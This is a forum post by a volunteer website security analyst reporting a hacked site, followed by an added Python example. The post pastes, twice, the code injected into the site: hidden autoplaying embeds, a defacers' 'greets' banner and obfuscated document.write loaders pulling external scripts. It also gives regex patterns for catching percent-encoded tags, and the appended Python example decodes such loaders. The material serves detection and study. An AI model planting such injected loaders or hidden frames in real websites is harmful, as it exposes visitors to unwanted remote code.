Author Topic: Malicious hacked website flagged?  (Read 1715 times)

Malicious hacked website flagged?
« on: September 11, 2015, 11:13:08 PM »
See: http://killmalware.com/1clickpublishing.com/
Compromised website: https://www.virustotal.com/nl/url/acb8909908fbec6918e2669675269b41cfce87ab1b506c3749fd70ab02ad19c8/analysis/
Blacklisted by Yandex: https://www.yandex.com/infected?url=1clickpublishing.com&l10n=en&redircnt=1442005785.1

ISSUE DETECTED    DEFINITION                                INFECTED URL
Website Malware   MW:IFRAME:HD202?v02                       -http://1clickpublishing.com
Website Malware   MW:JS:GEN2?web.js.script-injection.003    -http://1clickpublishing.com/404testpage4525d2fdc
Website Malware   MW:IFRAME:HD202?v02                       -http://1clickpublishing.com/404javascript.js
Known javascript malware. Details: -http://sucuri.net/malware/entry/MW:IFRAME:HD202?v02
<pre align="center"><b><EMBED SRC="-http://static.4shared.com/flash/player/5.6/player.swf?config=-http://static.4shared.com/flvplayer_facebook_embed_audio_config.xml&file=-http://mp3folder.biz/uploads/files/storage-18/2_1201135001.mp3" AUTOSTART="TRUE" LOOP="TRUE" WIDTH="0" HEIGHT="0" ALIGN="CENTER"></b></pre><footer id="det" style="position:fixed; left:0px; right:0px; bottom:0px; background:rgb(0,0,0); text-align:center; border-top: 1px solid #58FAF4; border-bottom: 1px solid #58FAF4"><font color=#ff0000 size=2 face="Tahoma"><font color="58FAF4">Greets~:</b></font><marquee scrollamount="5" scrolldelay="50" width="80%"><b>  - SpeTr0x - Mester Feisty - AdGhost - ayoub001 - Dr.Xkiller - Marco_Nader -The_Punishier - Le Parrain - DRX.TN </b></marquee></font> <script type="text/javascript">     var loc = (("-https:" == document.location.protocol) ? "-https://analytics." : "http://analytics.");     document.write(unescape("%3Cscript src='" + loc + "sitewit.com/v3/750336666/sw.js' type='text/javascript'%3E%3C/script%3E")); </script>    <script type="text/javascript">     var loc = (("https:" == document.location.protocol) ? "https://analytics." : "-http://analytics.");     document.write(unescape("%3Cscript src='" + loc + "-sitewit.com/v3/1365977375/sw.js' type='text/javascript'%3E%3C/script%3E")); </script>    <script type="text/javascript">     var loc = (("-https:" == document.location.protocol) ? "https://analytics." : "http://analytics.");     document.write(unescape("%3Cscript src='" + loc + "-sitewit.com/v3/750336666/sw.js' type='text/javascript'%3E%3C/script%3E")); </script>    <script type="text/javascript">     var loc = (("https:" == document.location.protocol) ? "https://analytics." : "-http://analytics.");     document.write(unescape("%3Cscript src='" + loc + "-sitewit.com/v3/1365977375/sw.js' type='text/javascript'%3E%3C/script%3E")); </script>    <script type="text/javascript">     var loc = (("https:" == document.location.protocol) ? "-https://analytics." 
: "-http://analytics.");     document.write(unescape("%3Cscript src='" + loc + "-sitewit.com/v3/1365977375/sw.js' type='text/javascript'%3E%3C/script%3E")); </script>   </body></html><center><iframe width="1" height="1" src="-https://www.youtube.com/embed/czdmyW683rM?rel=0&autoplay=1&loop=1&playlist=roORpS_E-Do" frameborder="0" allowfullscreen></iframe></center><SCRIPT Language=VBScript><!--

<pre align="center"><b><EMBED SRC="-http://static.4shared.com/flash/player/5.6/player.swf?config=-http://static.4shared.com/flvplayer_facebook_embed_audio_config.xml&file=-http://mp3folder.biz/uploads/files/storage-18/2_1201135001.mp3" AUTOSTART="TRUE" LOOP="TRUE" WIDTH="0" HEIGHT="0" ALIGN="CENTER"></b></pre><footer id="det" style="position:fixed; left:0px; right:0px; bottom:0px; background:rgb(0,0,0); text-align:center; border-top: 1px solid #58FAF4; border-bottom: 1px solid #58FAF4"><font color=#ff0000 size=2 face="Tahoma"><font color="58FAF4">Greets~:</b></font><marquee scrollamount="5" scrolldelay="50" width="80%"><b>  - SpeTr0x - Mester Feisty - AdGhost - ayoub001 - Dr.Xkiller - Marco_Nader -The_Punishier - Le Parrain - DRX.TN </b></marquee></font> <script type="text/javascript">     var loc = (("https:" == document.location.protocol) ? "https://analytics." : "http://analytics.");     document.write(unescape("<script src='" + loc + "sitewit.com/v3/750336666/sw.js' type='text/javascript'></script>")); </script>    <script type="text/javascript">     var loc = (("https:" == document.location.protocol) ? "https://analytics." : "http://analytics.");     document.write(unescape("<script src='" + loc + "sitewit.com/v3/1365977375/sw.js' type='text/javascript'></script>")); </script>    <script type="text/javascript">     var loc = (("https:" == document.location.protocol) ? "https://analytics." : "http://analytics.");     document.write(unescape("<script src='" + loc + "sitewit.com/v3/750336666/sw.js' type='text/javascript'></script>")); </script>    <script type="text/javascript">     var loc = (("https:" == document.location.protocol) ? "https://analytics." : "http://analytics.");     document.write(unescape("<script src='" + loc + "sitewit.com/v3/1365977375/sw.js' type='text/javascript'></script>")); </script>    <script type="text/javascript">     var loc = (("https:" == document.location.protocol) ? "https://analytics." 
: "http://analytics.");     document.write(unescape("<script src='" + loc + "sitewit.com/v3/1365977375/sw.js' type='text/javascript'></script>")); </script>   </body></html><center><iframe width="1" height="1" src="-https://www.youtube.com/embed/czdmyW683rM?rel=0&autoplay=1&loop=1&playlist=roORpS_E-Do" frameborder="0" allowfullscreen></iframe></center><SCRIPT Language=VBScript><!--

Website hacked: http://toolbar.netcraft.com/site_report?url=http://1clickpublishing.com
See: -http://www.domxssscanner.com/scan?url=http%3A%2F%2F1clickpublishing.com

Not flagged by Avast. On the "%3Cscript" in the hacked code, read here: http://stackoverflow.com/questions/13771238/3cscript-vs-script - regular expression pattern: /^<([a-z]+)([^<]+)*(?:>(.*)<\/\1>|\s+\/>)$/
Regular expression to detect tags: /((\%3c)|<)((\%2F)|/)*[a-z0-9\%]+((\%3E)|>)/ix
((\%3c)|<) will check for an opening angle bracket or its hex equivalent ('3C').
I treated that in musings and now we see where this has come in handy  ;)

Also issues here: http://www.dnsinspect.com/1clickpublishing.com/1442006468

polonus  (volunteer website security analyst and website error-hunter)
« Last Edit: September 11, 2015, 11:22:23 PM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!
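The detection idea polonus points to above, a tag scanner that matches angle brackets whether they are literal or percent-encoded (as in the document.write(unescape("%3Cscript ...")) pattern of the injected code), written out as an added Python example that is not part of the original post. The sample markup, the example.invalid host and the function names are constructed for this illustration.

```python
import re
from urllib.parse import unquote

# Pattern in the spirit of the one quoted in the post: an angle bracket, literal
# or percent-encoded (%3C), an optional slash (literal or %2F), a tag name and a
# closing bracket (literal or %3E). Case-insensitive, as the /i flag intends.
TAG_RE = re.compile(r"((%3C)|<)((%2F)|/)*[a-z0-9%]+((%3E)|>)", re.IGNORECASE)

# Grabs the argument of unescape(...) and the string literals inside it; the
# non-literal parts of the concatenation (the `loc` variable in the injected
# code) are unknown statically and are simply dropped.
UNESCAPE_RE = re.compile(r"unescape\(([^)]*)\)")
LITERAL_RE = re.compile(r'"([^"]*)"')
SCRIPT_SRC_RE = re.compile(r"<script[^>]*\bsrc=['\"]([^'\"]+)['\"]", re.IGNORECASE)


def find_tags(text):
    """Every tag-like token, whether written literally or percent-encoded."""
    return [m.group(0) for m in TAG_RE.finditer(text)]


def decoded_unescape_payloads(html):
    """Decode each unescape(...) argument the way the browser would at runtime,
    so the tags hidden behind %3C ... %3E become visible to a plain scanner."""
    payloads = []
    for m in UNESCAPE_RE.finditer(html):
        joined = "".join(LITERAL_RE.findall(m.group(1)))
        payloads.append(unquote(joined))
    return payloads


def injected_script_sources(html):
    """External script URLs that document.write(unescape(...)) would load."""
    sources = []
    for payload in decoded_unescape_payloads(html):
        sources.extend(SCRIPT_SRC_RE.findall(payload))
    return sources


# Constructed sample modelled on the injected block quoted in the post; the
# host name is a placeholder, not the real one.
SAMPLE = '''<script type="text/javascript"> var loc = (("https:" == document.location.protocol) ? "https://analytics." : "http://analytics."); document.write(unescape("%3Cscript src='" + loc + "example.invalid/sw.js' type='text/javascript'%3E%3C/script%3E")); </script>
<iframe width="1" height="1" src="https://example.invalid/embed"></iframe>'''

if __name__ == "__main__":
    print("encoded/literal tag hits:", find_tags(SAMPLE))
    print("decoded payloads:", decoded_unescape_payloads(SAMPLE))
    print("scripts that would be loaded:", injected_script_sources(SAMPLE))
```

Note that the quoted pattern only fires on bare tags such as </script> or %3C/script%3E; an opening <script src=...> with attributes is only caught after decoding, which is what injected_script_sources does.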